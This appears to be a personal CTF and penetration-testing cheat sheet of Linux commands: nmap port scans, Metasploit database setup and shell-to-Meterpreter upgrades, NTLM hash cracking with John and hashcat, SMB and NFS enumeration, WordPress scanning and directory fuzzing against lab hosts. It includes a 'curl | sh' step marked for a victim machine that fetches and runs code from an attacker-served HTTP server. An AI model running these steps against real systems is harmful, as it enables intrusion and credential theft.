Linux commands that are often used by hackers, security professional and CTF players. We will avoid any payloads or oneliner exploits ( will cover in different page sometime). Updated - October 02, 2023.

Add Target to hosts file

└─$ echo ' blue.thm' | sudo tee -a /etc/hosts
[sudo] password for abhinav: blue.thm


#for TCP Scan
sudo nmap -sC -sV -p- -T5 -Pn targethost

#for UDP Scan
sudo nmap -sU -sV -p- -T5 -Pn targethost

# Store scan results for ports separated by comma.
└─$ ports=$(nmap -p- --min-rate=1000 -T4 cronos.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

# Check which ports are found
└─$ echo $ports

# Pass the information in -p argument as $ports
└─$ sudo nmap -sC -sV -A -O -T5 -p$ports cronos.htb


Start Metasploit with database

# Pass the information in -p argument as $ports
└─$ systemctl start postgresql

└─$ msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema

Metasploit Shell Upgrade to Meterpreter

sessions -u 3
sessions -u -1
use post/multi/manage/shell_to_meterpreter
run session=-1

Cracking hash with John

└─$ john hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt 

Cracking hash with hashcat

Windows NTLM Hash

hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt.gz

Extract Files

Gz Files

gunzip archive.gz

tar Files

tar –xvzf archive.tar.gz

SSH Connection

ssh username@host -oHostKeyAlgorithms=+ssh-dss

Text Filter

grep -i #]- inlcude
grep -v #]- exclude

SMB Enumeration


nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target_HOST
smbclient //IP/directory

Mount NFS Share

make directory locally and mount it

mkdir /mnt/sampleDIR
sudo mount IP:/folder /mnt/sampleDIR


get version via banner

nc IP port


From github

curl -L | sh

Python Simple HTTP Server

python3 -m http.server 7777
curl | sh #Victim

Wordpress CMS Vulnerabilty Scanning

wpscan --url https://brainfuck.htb --disable-tls-checks

Directory Enumeration

└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://cronos.htb/FUZZ -mc 200,403 -c -t 400

└─$ gobuster dir -u  http://cronos.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 200 --quiet

Reading a File

head -20 filepathandname
tail filename
tail -20 filename
cat filename | grep "word_to_filter"

Replace in File

sed /s/wordtoreplace/wordtoreplacewith/g /filepath > outputfilepath